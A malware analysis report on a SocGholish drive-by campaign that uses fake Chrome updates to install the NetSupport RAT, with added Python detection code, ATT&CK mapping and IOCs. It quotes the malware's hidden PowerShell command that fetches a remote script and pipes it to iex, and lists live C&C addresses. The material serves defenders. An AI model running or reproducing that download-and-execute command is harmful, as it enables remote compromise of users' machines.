New Drive-by Download Campaign Spying on Users
SocGholish is a JavaScript malware framework that has been active since 2017. The term “Soc” in “SocGholish” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system.
This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.
Threat Actors (TAs) host a malicious website whose content lures end users with a supposedly critical browser update. The site implements a drive-by download mechanism, such as injected JavaScript code or Uniform Resource Locator (URL) redirections, that delivers an archive file containing the malware.
A SocGholish infection is usually only the foothold: it may lead to the deployment of further malware such as the Cobalt Strike framework, ransomware, information stealers and Remote Access Trojans (RATs).
The below figure depicts the infection chain used by the SocGholish framework.

Figure 1 – Infection chain of SocGholish
Technical Analysis
The infection chain begins when a user visits a compromised website that contains injected HTML code redirecting the visitor to a fake Chrome browser update page, which lures them into “updating” their Chrome installation.
Once the user clicks the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved in the “Downloads” folder.
The below figure shows a fake Chrome browser update page and the downloaded zip archive file.

The downloaded zip archive contains a heavily obfuscated JavaScript file named “AutoUpdater.js”, as shown below.

When the user opens the JavaScript file (by default, a double-clicked .js file runs under the Windows Script Host, wscript.exe), it launches a PowerShell command that downloads an additional PowerShell script from a remote server and executes it in memory.
The JavaScript uses the following PowerShell command line. The abbreviated parameters expand to -WindowStyle Hidden (-w h) and -Command (-c); iwr is the alias of Invoke-WebRequest, and the response text is piped straight into Invoke-Expression (iex) without being written to disk. Note that the script is served under an .ico extension, so the request looks like an icon download.
- “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex”
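The process tree this step leaves behind (a script host spawning a hidden PowerShell that fetches a URL and pipes it to iex) is the most reliable place to detect the chain, because every variant of the lure ends up here. The following is an added detection example, not code from the writeup or from the malware; it scores process-creation events with a small set of weighted indicators. The sample events, the indicator weights and the threshold are assumptions chosen for the example; event 1 reproduces the command line quoted above.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (parent image, child image, child command line), in the
# shape of Sysmon Event ID 1 / Windows 4688. Sample data for this example, not real telemetry.
# Event 1 reproduces the command line quoted in the writeup; the defanged URL is kept as-is.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\wscript.exe",
     'wscript.exe "C:\\Users\\victim\\Downloads\\AutoUpdater.js"'),
    ("C:\\Windows\\System32\\wscript.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -w h -c '
     '"iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"'),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1'),
    ("C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell.exe -Command "Invoke-WebRequest https://updates.example.test/tool.zip -OutFile tool.zip"'),
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")

# (indicator name, weight, pattern over the child command line). PowerShell accepts any
# unambiguous parameter prefix, so "-w h" means "-WindowStyle Hidden"; the first pattern
# covers the common short and long spellings rather than every legal prefix.
INDICATORS = [
    ("hidden_window", 1,
     re.compile(r"(?i)(?<!\S)-w(?:i|in|ind|indowstyle)?\s+h(?:idden)?(?!\S)")),
    ("download_cradle", 2,
     re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                r"downloadfile|net\.webclient|start-bitstransfer)\b")),
    ("pipe_to_iex", 3,
     re.compile(r"(?i)\|\s*(?:iex|invoke-expression)\b")),
    # A script fetched from a URL that ends in an image extension (15.ico above).
    ("script_behind_image_ext", 1,
     re.compile(r"(?i)h(?:tt|xx)ps?://\S+?\.(?:ico|png|gif|jpe?g|bmp)(?![\w.])")),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(parent: str, image: str, cmdline: str) -> Dict[str, object]:
    """Score one process-creation event. Only PowerShell children are assessed."""
    if basename(image) not in POWERSHELL:
        return {"score": 0, "indicators": []}
    hits: List[str] = []
    score = 0
    if basename(parent) in SCRIPT_HOSTS:        # wscript.exe -> powershell.exe is the SocGholish shape
        hits.append("script_host_parent")
        score += 3
    for name, weight, pattern in INDICATORS:
        if pattern.search(cmdline):
            hits.append(name)
            score += weight
    return {"score": score, "indicators": hits}


def triage(events: List[Tuple[str, str, str]], threshold: int = 5) -> List[Tuple[int, int, List[str]]]:
    """Return (event index, score, indicators) for every event at or above the threshold."""
    flagged = []
    for i, (parent, image, cmdline) in enumerate(events):
        result = assess(parent, image, cmdline)
        if result["score"] >= threshold:
            flagged.append((i, result["score"], result["indicators"]))
    return flagged


if __name__ == "__main__":
    for idx, score, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} indicators={hits}")
```

The admin backup job (event 2) and the interactive download to disk (event 3) stay below the threshold; the SocGholish command line trips every indicator. In a real deployment the weights belong in a Sigma rule or your SIEM's query language, but the decision logic is the same: the parent process and the pipe into iex carry most of the weight, because they are the parts an attacker cannot easily drop.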
The downloaded PowerShell script contains Base64-encoded streams. Each stream is decoded with the [System.Convert]::FromBase64String method and then gzip-decompressed through a System.IO.Compression.GZipStream opened with [System.IO.Compression.CompressionMode]::Decompress (an enumeration value passed to the stream, not a method), as shown below.

The decompressed data contains the embedded payloads together with the code that drops the NetSupport RAT client, renamed “whost.exe”, and its supporting files under the %AppData% directory, after which “whost.exe” is executed. The below figure shows the NetSupport client application along with its associated files.
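The Base64-then-gzip layering is easy to undo once you recognise the gzip magic bytes (1F 8B) at the start of the decoded data, and it is worth automating because the same loader pattern recurs across samples. The following is an added Python example, not code from the writeup or from the malware: it builds a constructed loader script in the same shape (FromBase64String feeding a GZipStream in Decompress mode), pulls every long Base64 run out of it, inflates the ones that are gzip streams, and lists the file names the decoded stage references. The stage contents and file names other than whost.exe are stand-ins invented for the example.

```python
import base64
import binascii
import gzip
import re
import zlib
from typing import List, Optional, Tuple

# Constructed stand-in for the embedded second stage: a PowerShell fragment shaped like the
# dropper described above (drop whost.exe under AppData, then launch it). Not the real payload;
# "settings.ini" is an invented name for one of the supporting files.
STAGE = (
    b'$d = Join-Path $env:AppData "whost"\r\n'
    b'New-Item -ItemType Directory -Force $d | Out-Null\r\n'
    b'[IO.File]::WriteAllBytes("$d\\whost.exe", $bin)\r\n'
    b'[IO.File]::WriteAllBytes("$d\\settings.ini", $cfg)\r\n'
    b'Start-Process "$d\\whost.exe"\r\n'
)


def build_sample_script() -> str:
    """Constructed loader using the FromBase64String + GZipStream(Decompress) pattern."""
    gz_b64 = base64.b64encode(gzip.compress(STAGE, mtime=0)).decode()
    plain_b64 = base64.b64encode(b"SETTINGS=" + b"A" * 55).decode()   # plain Base64, not gzip
    return (
        '$raw = [System.Convert]::FromBase64String("' + gz_b64 + '")\n'
        '$ms = New-Object System.IO.MemoryStream(,$raw)\n'
        '$gz = New-Object System.IO.Compression.GZipStream($ms, '
        '[System.IO.Compression.CompressionMode]::Decompress)\n'
        '$sr = New-Object System.IO.StreamReader($gz)\n'
        'Invoke-Expression $sr.ReadToEnd()\n'
        '$cfg = [System.Convert]::FromBase64String("' + plain_b64 + '")\n'
    )


# Long Base64 runs only; short identifiers in the script never reach 64 characters.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def decode_stream(b64_text: str) -> Optional[Tuple[str, bytes]]:
    """Base64-decode a candidate run; gunzip it when it carries the gzip magic (1F 8B).

    Returns ("gzip", inflated bytes), ("raw", decoded bytes) for plain Base64, or None
    when the run is not valid Base64 at all.
    """
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw[:2] != b"\x1f\x8b":
        return ("raw", raw)
    try:
        return ("gzip", gzip.decompress(raw))
    except (OSError, EOFError, zlib.error):
        return ("raw", raw)          # gzip magic but truncated or corrupt stream


def extract_streams(script_text: str) -> List[Tuple[int, str, bytes]]:
    """Every decodable Base64 run in the script as (offset, kind, data)."""
    found = []
    for m in B64_RUN.finditer(script_text):
        decoded = decode_stream(m.group(0))
        if decoded is not None:
            found.append((m.start(), decoded[0], decoded[1]))
    return found


FILE_REF = re.compile(rb"[\w.-]+\.(?:exe|dll|ini|dat|ps1)\b")


def dropped_artifacts(script_text: str) -> List[bytes]:
    """File names referenced inside inflated stages, for pivoting to on-disk artifacts."""
    names = set()
    for _, kind, data in extract_streams(script_text):
        if kind == "gzip":
            names.update(FILE_REF.findall(data))
    return sorted(names)


if __name__ == "__main__":
    script = build_sample_script()
    for offset, kind, data in extract_streams(script):
        print(f"offset {offset}: {kind}, {len(data)} bytes")
    print("referenced files:", dropped_artifacts(script))
```

Run against a real sample, feed the script text in place of build_sample_script(); a stage that is itself another loader (gzip inside Base64 inside a gzip stage) is handled by calling extract_streams again on the inflated bytes decoded as text.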

After dropping the payload, the PowerShell script creates a Run registry entry so that “whost.exe” starts whenever the user logs on to the machine.
The below figure shows the registry key created to establish persistence for the NetSupport client “whost.exe”.
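A Run-key entry that points into a user-writable directory such as %AppData% is the generic form of this persistence, so a hunt should key on the location of the launched image rather than on the name whost.exe. The following is an added example, not code from the writeup: it parses a constructed .reg-style export of a Run key and flags values whose executable lives under AppData, Temp, Downloads or Public. The writeup does not say which hive the entry was created in, so HKCU, the value name and the exact path are assumptions for the sample data.

```python
import re
from typing import List, Optional, Tuple

# Constructed .reg-style export. The hive (HKCU), value names and paths are assumptions for
# this example; only the fact that whost.exe is started from a Run entry comes from the writeup.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"whost"="C:\\Users\\victim\\AppData\\Roaming\\whost\\whost.exe"
"Updater"="\"%APPDATA%\\Updater\\svc.exe\" -silent"
"Spooler"=hex:00,01
'''

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')     # REG_SZ values only; hex:/dword: are skipped

# Locations a standard user can write to. %ProgramData% is deliberately left out: its
# subfolders have mixed ACLs and flagging it produces more noise than signal.
USER_WRITABLE = (
    "\\appdata\\roaming\\", "\\appdata\\local\\", "\\appdata\\locallow\\",
    "\\temp\\", "\\downloads\\", "\\users\\public\\",
    "%appdata%", "%localappdata%", "%temp%", "%tmp%",
)


def unescape_reg(value: str) -> str:
    """Undo .reg string escaping: \" becomes " and \\ becomes \ (quote escape first)."""
    return value.replace('\\"', '"').replace('\\\\', '\\')


def parse_run_entries(reg_text: str) -> List[Tuple[str, str, str]]:
    """(key, value name, command) for REG_SZ values under any key ending in \\Run or \\RunOnce."""
    key: Optional[str] = None
    entries = []
    for line in reg_text.splitlines():
        line = line.strip()
        km = KEY_LINE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = VALUE_LINE.match(line)
        if vm and key and key.lower().endswith(("\\run", "\\runonce")):
            entries.append((key, vm.group(1), unescape_reg(vm.group(2))))
    return entries


# Quoted image first; otherwise the first whitespace-free token ending in an executable
# extension (an unquoted path containing spaces is reported as unparseable rather than guessed).
EXE_RE = re.compile(r'^(?:"([^"]+)"|(\S+?\.(?:exe|com|bat|cmd|vbs|js|ps1|scr)))', re.I)


def command_image(command: str) -> Optional[str]:
    m = EXE_RE.match(command.strip())
    if not m:
        return None
    return m.group(1) or m.group(2)


def suspicious_run_entries(reg_text: str) -> List[Tuple[str, str, str, str]]:
    """(key, name, image, reason) for Run entries that start from a user-writable location."""
    findings = []
    for key, name, command in parse_run_entries(reg_text):
        image = command_image(command)
        if image is None:
            findings.append((key, name, command, "unparseable command"))
            continue
        low = image.lower()
        for marker in USER_WRITABLE:
            if marker in low:
                findings.append((key, name, image, "launches from user-writable location " + marker.strip("\\")))
                break
    return findings


if __name__ == "__main__":
    for key, name, image, reason in suspicious_run_entries(SAMPLE_REG):
        print(f"{key}\\{name}: {image} ({reason})")
```

On a live host the same logic applies to the output of reg export or Get-ItemProperty over both the HKCU and HKLM Run and RunOnce keys; a hit is a lead, not a verdict, since some legitimate per-user installers also start from %LocalAppData%, and the next step is checking the image's signature and origin.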

NetSupport Manager RAT
NetSupport Manager is a commercially available remote administration tool (RAT) that gives administrators remote access to users’ computers for legitimate support purposes. The same legitimate client can be abused by TAs to gain unauthorized access to compromised systems, so its presence alone is not proof of compromise; how it arrived and where it connects are what distinguish an abuse case from a licensed deployment.
Upon execution, the NetSupport client attempts to identify the victim’s geolocation by contacting the following URL:
- hxxp://geo.netsupportsoftware[.]com/location/loca[.]asp
We also observed that the installed RAT sends victim information in encrypted form via POST requests to the following Command-and-Control (C&C) server URL:
- hxxp://149.248.8[.]148/fakeurl[.]htm
The figure below shows the network communication established to send the victim’s information to the TA’s C&C server.

Once the client connects back, the TAs can perform several malicious activities such as monitoring the victim’s system, transferring files, launching applications, identifying the system location, remotely retrieving inventory and system information, etc.
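The two network observations above separate cleanly into an informational signal (the geo lookup, which a licensed NetSupport installation makes too) and a high-confidence one (POST traffic to a bare IP at /fakeurl.htm). The following is an added Python example, not code from the writeup: it runs both checks plus the page's host IOCs over constructed proxy log lines and correlates them per client, escalating a host that POSTs to a bare IP shortly after the geo lookup even when that IP is not on the IOC list. The log format, timestamps, client addresses and the 15-minute window are assumptions for the example; the indicator values are the ones in the writeup, written in live form because that is how they appear in logs.

```python
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, Set
from urllib.parse import urlsplit

# Constructed proxy log lines: timestamp, client IP, method, URL, status, bytes sent.
# Sample data for this example, not a real capture. Host 10.0.0.5 plays the infected machine,
# 10.0.0.9 a machine running NetSupport for some other reason, 10.0.0.7 a clean machine.
SAMPLE_LOG = """\
2023-05-02T09:14:03Z 10.0.0.5 GET http://aeoi.pl/15.ico 200 0
2023-05-02T09:14:41Z 10.0.0.5 GET http://geo.netsupportsoftware.com/location/loca.asp 200 0
2023-05-02T09:14:44Z 10.0.0.5 POST http://149.248.8.148/fakeurl.htm 200 688
2023-05-02T09:15:44Z 10.0.0.5 POST http://149.248.8.148/fakeurl.htm 200 412
2023-05-02T09:20:10Z 10.0.0.9 GET http://geo.netsupportsoftware.com/location/loca.asp 200 0
2023-05-02T09:21:00Z 10.0.0.7 POST https://login.example.test/api/session 200 523
2023-05-02T09:22:30Z 10.0.0.7 GET http://93.184.216.34/index.html 200 0
"""

# Indicators from the writeup (defanged there as aeoi[.]pl, 149.248.8[.]148, 94.158.247[.]32).
IOC_HOSTS = {"aeoi.pl", "149.248.8.148", "94.158.247.32"}
GEO_HOST, GEO_PATH = "geo.netsupportsoftware.com", "/location/loca.asp"
C2_PATH = "/fakeurl.htm"
WINDOW = timedelta(minutes=15)          # assumed correlation window, geo lookup -> first beacon


def parse_line(line: str) -> Dict[str, object]:
    ts, src, method, url, _status, sent = line.split()
    parts = urlsplit(url)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "src": src, "method": method,
        "host": parts.hostname or "", "path": parts.path, "sent": int(sent),
    }


def is_bare_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(log_text: str) -> Dict[str, Dict[str, object]]:
    """Per client IP: the signals seen and a verdict of malicious / review / none."""
    per_host: Dict[str, Dict[str, object]] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        state = per_host.setdefault(ev["src"], {"signals": set(), "geo_ts": None, "verdict": "none"})
        signals: Set[str] = state["signals"]
        if ev["host"] == GEO_HOST and ev["path"] == GEO_PATH:
            signals.add("netsupport_geo_lookup")        # informational on its own
            state["geo_ts"] = ev["ts"]
        if ev["host"] in IOC_HOSTS:
            signals.add("ioc_host_match")
        if ev["method"] == "POST" and is_bare_ip(ev["host"]):
            if ev["path"] == C2_PATH:
                signals.add("post_fakeurl_to_bare_ip")
            elif state["geo_ts"] is not None and ev["ts"] - state["geo_ts"] <= WINDOW:
                # Heuristic generalisation: a NetSupport geo check followed by POSTs to a raw
                # IP looks like a client talking to an unlisted gateway. Treat as malicious.
                signals.add("post_to_bare_ip_after_geo_lookup")
    for state in per_host.values():
        s = state["signals"]
        if s & {"ioc_host_match", "post_fakeurl_to_bare_ip", "post_to_bare_ip_after_geo_lookup"}:
            state["verdict"] = "malicious"
        elif "netsupport_geo_lookup" in s:
            state["verdict"] = "review"                # NetSupport present; confirm it is sanctioned
    return per_host


if __name__ == "__main__":
    for src, state in classify(SAMPLE_LOG).items():
        print(f"{src}: {state['verdict']} {sorted(state['signals'])}")
```

The review verdict for 10.0.0.9 is the important design choice: blocking or alerting on geo.netsupportsoftware.com outright would fire on every legitimate NetSupport seat in the estate, whereas the combination with an unexplained POST destination, or with the file and registry artifacts described earlier, does not.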
Conclusion
Threat Actors use various techniques to deploy their malicious payloads onto victim systems. Over the course of our research, we observed TAs using fake browser updates (SocGholish) to deliver the NetSupport RAT.
When downloading files from the internet, users should confirm that the content originated from a legitimate source and not from a suspicious site. Software such as web browsers typically notifies users about updates within the application itself and never requires an update to be fetched from a third-party website; a page that asks for this should be treated as a lure.
Cyble Research & Intelligence Labs actively monitors new malicious campaigns and keeps our readers updated with our latest findings.
Our Recommendations
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees on protecting themselves from threats such as phishing and untrusted URLs.
- Avoid downloading files from unknown websites.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Block URLs that could spread the malware, e.g., Torrent/Warez.
- Monitor beaconing at the network level and block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
MITRE ATT&CK® Techniques
Tactic | Technique ID | Technique Name |
Initial Access | T1189 | Drive-by Compromise |
Execution | T1204 | User Execution |
Execution | T1059.007 | Command and Scripting Interpreter: JavaScript |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Privilege Escalation | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
Privilege Escalation | T1055 | Process Injection |
Defence Evasion | T1027 | Obfuscated Files or Information |
Defence Evasion | T1497 | Virtualization/Sandbox Evasion |
Defence Evasion | T1140 | Deobfuscate/Decode Files or Information |
Discovery | T1082 | System Information Discovery |
Command and Control | T1219 | Remote Access Software |
Command and Control | T1105 | Ingress Tool Transfer |
Indicators of Compromise (IOCs)
Indicator | Indicator Type | Description |
d5812e63327b5f5491c1a55c74737540 | MD5 | Archive file “Сhrome.Updаte.zip” |
0af611819cd098c1ff3942431fc327dc75b83344 | SHA1 | Archive file “Сhrome.Updаte.zip” |
bad65408eb581fe39ded2637473bd4458b03e183ecc03164d6f8cf683a3e408e | SHA256 | Archive file “Сhrome.Updаte.zip” |
dc123142cb787d395814027ff4046842 | MD5 | Archive file “Сhrome.Updаte.zip” |
f4aaa317e23fb5446fc29fdbabfa4f0fc7090f59 | SHA1 | Archive file “Сhrome.Updаte.zip” |
520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 | SHA256 | Archive file “Сhrome.Updаte.zip” |
606df8a69873fcc00754a6bb245ab5ae | MD5 | JavaScript file “AutoUpdater.js” |
6842a4b32aa6a80c75bed4cdf09235c9a5f7e87b | SHA1 | JavaScript file “AutoUpdater.js” |
6f0fac3b955e63f25bd199ec373c677152212fceda20d8bc6672cf62e68482e8 | SHA256 | JavaScript file “AutoUpdater.js” |
eca593e95d2e919fb4b5f55b62b663df | MD5 | JavaScript file “AutoUpdater.js” |
406d6f811df8c0f9a16a36117be6772f25fcb214 | SHA1 | JavaScript file “AutoUpdater.js” |
1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d | SHA256 | JavaScript file “AutoUpdater.js” |
dad848c52d27ed20002825df023c4d7c | MD5 | PS1 file “15.ico.ps1” (second-stage PowerShell script) |
48e49867904d83b35361d6c5f809d16bc251f334 | SHA1 | PS1 file “15.ico.ps1” (second-stage PowerShell script) |
4a59ac7ae76abb86ab2e035adbe5253247a2aad9b1ce9f59b3145333e34c26f7 | SHA256 | PS1 file “15.ico.ps1” (second-stage PowerShell script) |
252dce576f9fbb9aaa7114dd7150f320 | MD5 | EXE file “whost.exe” (NetSupport client) |
c07f0a02c284b697dff119839f455836be39d10e | SHA1 | EXE file “whost.exe” (NetSupport client) |
b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad | SHA256 | EXE file “whost.exe” (NetSupport client) |
hxxp://aeoi[.]pl/15.ico | URL | Second-stage PowerShell script download / C&C server |
hxxp://aeoi[.]pl/21.ico | URL | C&C server |
149.248.8.148 | IP | C&C server |
94.158.247.32 | IP | C&C server |